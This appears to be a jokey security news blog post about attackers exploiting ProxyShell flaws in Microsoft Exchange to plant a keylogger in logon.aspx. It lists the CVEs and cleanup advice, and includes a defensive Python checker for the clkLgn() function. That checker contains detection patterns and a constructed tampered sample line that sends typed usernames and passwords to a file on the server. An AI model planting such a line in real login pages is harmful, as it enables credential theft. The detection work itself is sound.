Alert: Keylogger Malware Hijacks Microsoft Exchange Servers – African and Middle Eastern Entities Under Cyber Siege!

Cyber villains are sneakily keylogging their way through the Middle East and Africa, leveraging ancient spells—er, flaws—in Microsoft Exchange Server. With a digital sleight of hand, they’ve left over 30 entities fumbling for their credentials since 2021. Keep your eyes peeled for the clkLgn() mischief!

Hot Take:

Well, it seems like someone’s been playing too much “Spy vs. Spy” in the tech realm. Those sneaky threat actors are at it again, turning Microsoft Exchange Servers into their own personal confessionals where the passwords are the sins. And if you’re in Africa or the Middle East, you might want to double-check your server’s diary entries. It’s like a digital “Ocean’s Eleven,” but instead of robbing casinos, they’re lifting credentials. Who knew cybersecurity could have such a soap opera twist?

Key Points:

  • Unknown cyber villains are using old flaws in Microsoft Exchange to slip in a keylogger, like a bad roommate copying your diary key.
  • They’re not choosy—government agencies, banks, and schools across Africa and the Middle East are all on the hit list.
  • The digital heist began in 2021, exploiting the ProxyShell vulnerabilities that are so last season (patched in May 2021).
  • These cyber intruders are like magicians, making credentials appear in files as if by magic—or, well, by clicking the sign-in button.
  • Positive Technologies is scratching its head over who's behind this, but it does offer some sage advice: update and check your server for digital footprints.
ProxyShell CVEs:

  • CVE-2021-34473: Microsoft Exchange Server Remote Code Execution Vulnerability (assigner: microsoft; state: PUBLISHED; updated 12/28/2023)
  • CVE-2021-34523: Microsoft Exchange Server Elevation of Privilege Vulnerability (assigner: microsoft; state: PUBLISHED; updated 12/28/2023)
  • CVE-2021-31207: Microsoft Exchange Server Security Feature Bypass Vulnerability (assigner: microsoft; state: PUBLISHED; updated 12/28/2023)

Need to know more?

When Servers Become Diaries:

Imagine your server is like your middle school diary, and there's a nosy sibling—only this time, it's a cyber attacker flipping through the pages. They're targeting a who's who list of entities in Africa and the Middle East and seem to have a particular taste for the VIPs of society: government, banks, you name it. It's like the attackers are on a virtual safari, and every server is a photo op.

The Time Machine of Exploits:

The cyber baddies are exploiting ProxyShell vulnerabilities, which is so 2021. Come on, threat actors, at least keep up with the times! These flaws were patched faster than you can say "software update," but it seems like some folks missed the memo. The result? A sneaky bit of code inserted into the server's main squeeze, "logon.aspx," which might as well be renamed "stealme.aspx."

The Invisible Hand:

The attackers are like digital pickpockets, slipping their keylogger into the server's sign-in page (that logon.aspx again) with the precision of a street magician. Before you know it, your credentials are being whisked away to a file reachable over the internet, ready to be plucked by the attacker at a moment's notice. It's a modern-day "Artful Dodger" scenario, and your server is Oliver Twist.

Who Done It?:

The folks at Positive Technologies are playing detective, but even they can't pin the tail on this donkey yet. Is it a lone wolf? A cyber syndicate? The digital mafia? Whoever they are, they're playing the long game, and our cybersecurity experts are still piecing together this jigsaw puzzle of digital deceit.

The Fixer-Upper:

If you're sweating bullets over your server's security, take a leaf out of Positive Technologies' book: update your servers, and play a game of "I Spy" with your Exchange Server's sign-in page, logon.aspx. Look for signs of cyber tampering, especially around that clkLgn() function—because if there's something strange in your server neighborhood, who you gonna call? IT support!

And remember, if you find that your server has been compromised, it's not enough to just wave a white flag. You've got to play cleanup crew, scrubbing away the digital fingerprints these cyber culprits left behind. Secure the stolen account data, and say adios to the hacker's file stash. It's time to turn your server's security from a comedy of errors into an impenetrable fortress.
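One way to run that "I Spy" check on clkLgn(), as an added example that is not from the original post or from Positive Technologies: a Python script that pulls the clkLgn() function out of a copy of logon.aspx, diffs it against a known-good copy (say, from a freshly installed server on the same Exchange build), and flags constructs that have no business in a sign-in handler. The sample pages, the gbid() helper and the CONSTRUCTED.aspx path are made up for the example.

```python
from __future__ import annotations
import difflib
import re

# Constructs that do not belong inside the OWA sign-in handler: server-side
# script blocks, and client-side code that ships form values anywhere.
SUSPICIOUS = [
    (r"<%", "server-side code block inside clkLgn()"),
    (r"XMLHttpRequest|fetch\s*\(|sendBeacon", "network call inside clkLgn()"),
    (r"new\s+Image\s*\(\s*\)\s*\.src", "image-beacon style request inside clkLgn()"),
    (r"document\.cookie", "cookie access inside clkLgn()"),
]

def extract_clklgn(source: str) -> str | None:
    """Return the brace-balanced body of function clkLgn(), or None if absent."""
    m = re.search(r"function\s+clkLgn\s*\(\s*\)\s*\{", source)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(source) and depth > 0:
        depth += {"{": 1, "}": -1}.get(source[i], 0)
        i += 1
    return source[m.end():i - 1] if depth == 0 else None

def check_logon_page(source: str, baseline_body: str) -> list[str]:
    """Report how clkLgn() in `source` deviates from a known-good body."""
    body = extract_clklgn(source)
    if body is None:
        return ["clkLgn() not found or has unbalanced braces"]
    findings = []
    if body.strip() != baseline_body.strip():
        diff = difflib.unified_diff(baseline_body.splitlines(), body.splitlines(), lineterm="")
        added = [l[1:].strip() for l in diff if l.startswith("+") and not l.startswith("+++")]
        findings.append("clkLgn() differs from baseline; added: " + " | ".join(added))
    findings += [why for pat, why in SUSPICIOUS if re.search(pat, body)]
    return findings

# Constructed, simplified stand-in for the clkLgn() in logon.aspx (not Microsoft's code).
CLEAN = """<script type="text/javascript">
function clkLgn() {
    if (gbid("rdoPrvt").checked) { setPvtCookie(); }
    gbid("lgnForm").submit();
}
</script>"""
# Constructed tampered variant: one extra line that leaks the typed credentials.
TAMPERED = CLEAN.replace('gbid("lgnForm").submit();',
    'new Image().src = "/owa/auth/CONSTRUCTED.aspx?u=" + gbid("username").value '
    '+ "&p=" + gbid("password").value;\n    gbid("lgnForm").submit();')

if __name__ == "__main__":
    for name, page in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(name, check_logon_page(page, extract_clklgn(CLEAN)) or ["no findings"])
```

Point it at the logon.aspx under every OWA and ECP auth directory on the server, and treat any difference from a clean copy as something to investigate rather than tidy up.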

Tags: CVE-2021-31207, CVE-2021-34473, CVE-2021-34523, keylogger malware, Microsoft Exchange Server, Middle East and Africa targeted, Positive Technologies, ProxyShell vulnerabilities